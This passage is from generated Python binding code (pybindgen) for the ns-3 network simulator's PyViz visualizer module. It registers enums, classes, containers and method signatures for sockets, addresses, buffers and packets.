    ## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration]
    module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
    ## socket.h (module 'network'): ns3::Socket::SocketType [enumeration]
    module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
    ## socket.h (module 'network'): ns3::SocketAddressTag [class]
    module.add_class('SocketAddressTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketIpTtlTag [class]
    module.add_class('SocketIpTtlTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class]
    module.add_class('SocketSetDontFragmentTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## nstime.h (module 'core'): ns3::Time [class]
    module.add_class('Time', import_from_module='ns.core')
    ## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
    module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
    ## nstime.h (module 'core'): ns3::Time [class]
    root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
    ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
    module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
    ## trailer.h (module 'network'): ns3::Trailer [class]
    module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
    ## attribute.h (module 'core'): ns3::AttributeAccessor [class]
    module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
    ## attribute.h (module 'core'): ns3::AttributeChecker [class]
    module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
    ## attribute.h (module 'core'): ns3::AttributeValue [class]
    module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
    ## callback.h (module 'core'): ns3::CallbackChecker [class]
    module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## callback.h (module 'core'): ns3::CallbackImplBase [class]
    module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
    ## callback.h (module 'core'): ns3::CallbackValue [class]
    module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## channel.h (module 'network'): ns3::Channel [class]
    module.add_class('Channel', import_from_module='ns.network', parent=root_module['ns3::Object'])
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
    module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## event-impl.h (module 'core'): ns3::EventImpl [class]
    module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
    ## ipv4.h (module 'internet'): ns3::Ipv4 [class]
    module.add_class('Ipv4', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
    module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
    module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol [class]
    module.add_class('Ipv4L3Protocol', import_from_module='ns.internet', parent=root_module['ns3::Ipv4'])
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::DropReason [enumeration]
    module.add_enum('DropReason', ['DROP_TTL_EXPIRED', 'DROP_NO_ROUTE', 'DROP_BAD_CHECKSUM', 'DROP_INTERFACE_DOWN', 'DROP_ROUTE_ERROR', 'DROP_FRAGMENT_TIMEOUT'], outer_class=root_module['ns3::Ipv4L3Protocol'], import_from_module='ns.internet')
    ## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol [class]
    module.add_class('Ipv4L4Protocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol::RxStatus [enumeration]
    module.add_enum('RxStatus', ['RX_OK', 'RX_CSUM_FAILED', 'RX_ENDPOINT_CLOSED', 'RX_ENDPOINT_UNREACH'], outer_class=root_module['ns3::Ipv4L4Protocol'], import_from_module='ns.internet')
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
    module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
    module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute [class]
    module.add_class('Ipv4MulticastRoute', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
    ## ipv4-route.h (module 'internet'): ns3::Ipv4Route [class]
    module.add_class('Ipv4Route', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
    ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol [class]
    module.add_class('Ipv4RoutingProtocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
    module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
    module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
    module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
    module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker [class]
    module.add_class('Mac48AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## mac48-address.h (module 'network'): ns3::Mac48AddressValue [class]
    module.add_class('Mac48AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## net-device.h (module 'network'): ns3::NetDevice [class]
    module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object'])
    ## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
    module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network')
    ## nix-vector.h (module 'network'): ns3::NixVector [class]
    module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
    ## node.h (module 'network'): ns3::Node [class]
    module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object'])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
    module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
    module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class]
    module.add_class('OutputStreamWrapper', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
    ## packet.h (module 'network'): ns3::Packet [class]
    module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
    ## nstime.h (module 'core'): ns3::TimeChecker [class]
    module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## nstime.h (module 'core'): ns3::TimeValue [class]
    module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## type-id.h (module 'core'): ns3::TypeIdChecker [class]
    module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## type-id.h (module 'core'): ns3::TypeIdValue [class]
    module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## address.h (module 'network'): ns3::AddressChecker [class]
    module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## address.h (module 'network'): ns3::AddressValue [class]
    module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## STL container instantiations used by the wrapped APIs.
    module.add_container('std::vector< ns3::PyViz::RxPacketSample >', 'ns3::PyViz::RxPacketSample', container_type='vector')
    module.add_container('std::vector< ns3::PyViz::TxPacketSample >', 'ns3::PyViz::TxPacketSample', container_type='vector')
    module.add_container('std::vector< ns3::PyViz::PacketSample >', 'ns3::PyViz::PacketSample', container_type='vector')
    module.add_container('std::set< ns3::TypeId >', 'ns3::TypeId', container_type='set')
    module.add_container('std::vector< ns3::PyViz::TransmissionSample >', 'ns3::PyViz::TransmissionSample', container_type='vector')
    module.add_container('std::vector< ns3::PyViz::PacketDropSample >', 'ns3::PyViz::PacketDropSample', container_type='vector')
    module.add_container('std::vector< ns3::PyViz::NetDeviceStatistics >', 'ns3::PyViz::NetDeviceStatistics', container_type='vector')
    module.add_container('std::vector< std::string >', 'std::string', container_type='vector')
    module.add_container('std::set< unsigned int >', 'unsigned int', container_type='set')
    module.add_container('std::vector< ns3::PyViz::NodeStatistics >', 'ns3::PyViz::NodeStatistics', container_type='vector')
    module.add_container('std::map< unsigned int, unsigned int >', ('unsigned int', 'unsigned int'), container_type='map')
    ## Register a nested module for the namespace FatalImpl
    nested_module = module.add_cpp_namespace('FatalImpl')
    register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
    """Register types for the nested ns3::FatalImpl namespace.

    Generated stub: no types are declared in this namespace, so the
    function only fetches the root module and registers nothing.
    """
    root_module = module.get_root()
def register_methods(root_module):
    """Register the wrapped methods of every class exposed by this module.

    Dispatches to one register_Ns3*_methods helper per class; each helper
    receives the root module and the class wrapper looked up by its fully
    qualified C++ name.  The call order below is preserved from generation.
    NOTE(review): this looks like pybindgen-generated ns-3 binding code --
    regenerate it rather than hand-editing.
    """
    register_Ns3Address_methods(root_module, root_module['ns3::Address'])
    register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
    register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
    register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
    register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
    register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
    register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
    register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
    register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
    register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
    register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
    register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
    register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
    register_Ns3Ipv4InterfaceAddress_methods(root_module, root_module['ns3::Ipv4InterfaceAddress'])
    register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
    register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
    register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
    register_Ns3Mac48Address_methods(root_module, root_module['ns3::Mac48Address'])
    register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
    register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
    register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
    register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
    register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
    register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
    register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
    register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
    register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
    register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
    register_Ns3PyViz_methods(root_module, root_module['ns3::PyViz'])
    register_Ns3PyVizLastPacketsSample_methods(root_module, root_module['ns3::PyViz::LastPacketsSample'])
    register_Ns3PyVizNetDeviceStatistics_methods(root_module, root_module['ns3::PyViz::NetDeviceStatistics'])
    register_Ns3PyVizNodeStatistics_methods(root_module, root_module['ns3::PyViz::NodeStatistics'])
    register_Ns3PyVizPacketCaptureOptions_methods(root_module, root_module['ns3::PyViz::PacketCaptureOptions'])
    register_Ns3PyVizPacketDropSample_methods(root_module, root_module['ns3::PyViz::PacketDropSample'])
    register_Ns3PyVizPacketSample_methods(root_module, root_module['ns3::PyViz::PacketSample'])
    register_Ns3PyVizRxPacketSample_methods(root_module, root_module['ns3::PyViz::RxPacketSample'])
    register_Ns3PyVizTransmissionSample_methods(root_module, root_module['ns3::PyViz::TransmissionSample'])
    register_Ns3PyVizTxPacketSample_methods(root_module, root_module['ns3::PyViz::TxPacketSample'])
    register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
    register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
    register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
    register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
    register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
    register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
    register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
    register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
    register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
    register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
    register_Ns3Header_methods(root_module, root_module['ns3::Header'])
    register_Ns3Ipv4Header_methods(root_module, root_module['ns3::Ipv4Header'])
    register_Ns3Object_methods(root_module, root_module['ns3::Object'])
    register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
    register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
    register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
    register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
    register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
    register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
    register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
    register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
    register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
    register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
    register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
    register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
    register_Ns3Socket_methods(root_module, root_module['ns3::Socket'])
    register_Ns3SocketAddressTag_methods(root_module, root_module['ns3::SocketAddressTag'])
    register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag'])
    register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag'])
    register_Ns3Time_methods(root_module, root_module['ns3::Time'])
    register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
    register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
    register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
    register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
    register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
    register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
    register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
    register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
    register_Ns3Channel_methods(root_module, root_module['ns3::Channel'])
    register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
    register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
    register_Ns3Ipv4_methods(root_module, root_module['ns3::Ipv4'])
    register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
    register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
    register_Ns3Ipv4L3Protocol_methods(root_module, root_module['ns3::Ipv4L3Protocol'])
    register_Ns3Ipv4L4Protocol_methods(root_module, root_module['ns3::Ipv4L4Protocol'])
    register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
    register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
    register_Ns3Ipv4MulticastRoute_methods(root_module, root_module['ns3::Ipv4MulticastRoute'])
    register_Ns3Ipv4Route_methods(root_module, root_module['ns3::Ipv4Route'])
    register_Ns3Ipv4RoutingProtocol_methods(root_module, root_module['ns3::Ipv4RoutingProtocol'])
    register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
    register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
    register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
    register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
    register_Ns3Mac48AddressChecker_methods(root_module, root_module['ns3::Mac48AddressChecker'])
    register_Ns3Mac48AddressValue_methods(root_module, root_module['ns3::Mac48AddressValue'])
    register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
    register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
    register_Ns3Node_methods(root_module, root_module['ns3::Node'])
    register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
    register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
    register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper'])
    register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
    register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
    register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
    register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
    register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
    register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
    register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
    return
def register_Ns3Address_methods(root_module, cls):
    """Register ns3::Address (address.h): comparison/stream operators,
    constructors, and the copy/serialize accessor surface."""
    # Comparison and output-stream operators, registered first.
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Address(); Address(type, buffer, len); Address(const Address &).
    cls.add_constructor([])
    cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
    cls.add_constructor([param('ns3::Address const &', 'address')])
    # bool CheckCompatible(type, len) const.
    cls.add_method('CheckCompatible', 'bool', [param('uint8_t', 'type'), param('uint8_t', 'len')], is_const=True)
    # Raw-byte copy helpers.
    cls.add_method('CopyAllFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
    cls.add_method('CopyAllTo', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint8_t', 'len')], is_const=True)
    cls.add_method('CopyFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
    cls.add_method('CopyTo', 'uint32_t', [param('uint8_t *', 'buffer')], is_const=True)
    # void Deserialize(TagBuffer).
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'buffer')])
    # Simple const getters.
    cls.add_method('GetLength', 'uint8_t', [], is_const=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    cls.add_method('IsInvalid', 'bool', [], is_const=True)
    # bool IsMatchingType(type) const.
    cls.add_method('IsMatchingType', 'bool', [param('uint8_t', 'type')], is_const=True)
    # static uint8_t Register().
    cls.add_method('Register', 'uint8_t', [], is_static=True)
    # void Serialize(TagBuffer) const.
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'buffer')], is_const=True)
    return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
    """Register ns3::AttributeConstructionList (attribute-construction-list.h):
    constructors, Add, Begin/End iteration and Find lookup."""
    # Copy and default constructors.
    cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
    cls.add_constructor([])
    # void Add(name, checker, value).
    cls.add_method('Add', 'void',
                   [param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
    # Const list iterators over the stored items.
    for iter_name in ('Begin', 'End'):
        cls.add_method(iter_name,
                       'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
                       [], is_const=True)
    # Ptr<AttributeValue> Find(checker) const.
    cls.add_method('Find', 'ns3::Ptr< ns3::AttributeValue >',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True)
    return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
    """Register ns3::AttributeConstructionList::Item: both constructors and
    its three public data members (checker, name, value)."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
    # Mutable public fields, registered in the original order.
    for field_name, cpp_type in (
            ('checker', 'ns3::Ptr< ns3::AttributeChecker const >'),
            ('name', 'std::string'),
            ('value', 'ns3::Ptr< ns3::AttributeValue >')):
        cls.add_instance_attribute(field_name, cpp_type, is_const=False)
    return
def register_Ns3Buffer_methods(root_module, cls):
    """Register ns3::Buffer (buffer.h): constructors, grow/shrink helpers,
    iterator accessors, copy/fragment operations and (de)serialization."""
    # Constructors: default, sized, sized + initialize flag, copy.
    cls.add_constructor([])
    cls.add_constructor([param('uint32_t', 'dataSize')])
    cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
    cls.add_constructor([param('ns3::Buffer const &', 'o')])
    # Grow the buffer at either end (AddAtEnd is overloaded).
    cls.add_method('AddAtEnd', 'bool', [param('uint32_t', 'end')])
    cls.add_method('AddAtEnd', 'void', [param('ns3::Buffer const &', 'o')])
    cls.add_method('AddAtStart', 'bool', [param('uint32_t', 'start')])
    # Iterator Begin() const.
    cls.add_method('Begin', 'ns3::Buffer::Iterator', [], is_const=True)
    # CopyData overloads: into an ostream or a raw byte array.
    cls.add_method('CopyData', 'void', [param('std::ostream *', 'os'), param('uint32_t', 'size')], is_const=True)
    cls.add_method('CopyData', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], is_const=True)
    # Fragment / full-copy creation.
    cls.add_method('CreateFragment', 'ns3::Buffer', [param('uint32_t', 'start'), param('uint32_t', 'length')], is_const=True)
    cls.add_method('CreateFullCopy', 'ns3::Buffer', [], is_const=True)
    # uint32_t Deserialize(buffer, size).
    cls.add_method('Deserialize', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    # Iterator End() const.
    cls.add_method('End', 'ns3::Buffer::Iterator', [], is_const=True)
    # Simple const getters.
    cls.add_method('GetCurrentEndOffset', 'int32_t', [], is_const=True)
    cls.add_method('GetCurrentStartOffset', 'int32_t', [], is_const=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    cls.add_method('GetSize', 'uint32_t', [], is_const=True)
    cls.add_method('PeekData', 'uint8_t const *', [], is_const=True)
    # Shrink the buffer at either end.
    cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'end')])
    cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'start')])
    # uint32_t Serialize(buffer, maxSize) const.
    cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True)
    return
def register_Ns3BufferIterator_methods(root_module, cls):
    """Register ns3::Buffer::Iterator (buffer.h): constructors, cursor
    movement, checksum helper, and the typed Read*/Write* families."""
    # Copy and default constructors.
    cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
    cls.add_constructor([])
    # uint16_t CalculateIpChecksum(size [, initialChecksum]).
    cls.add_method('CalculateIpChecksum', 'uint16_t', [param('uint16_t', 'size')])
    cls.add_method('CalculateIpChecksum', 'uint16_t', [param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
    # Position queries.
    cls.add_method('GetDistanceFrom', 'uint32_t', [param('ns3::Buffer::Iterator const &', 'o')], is_const=True)
    cls.add_method('GetSize', 'uint32_t', [], is_const=True)
    cls.add_method('IsEnd', 'bool', [], is_const=True)
    cls.add_method('IsStart', 'bool', [], is_const=True)
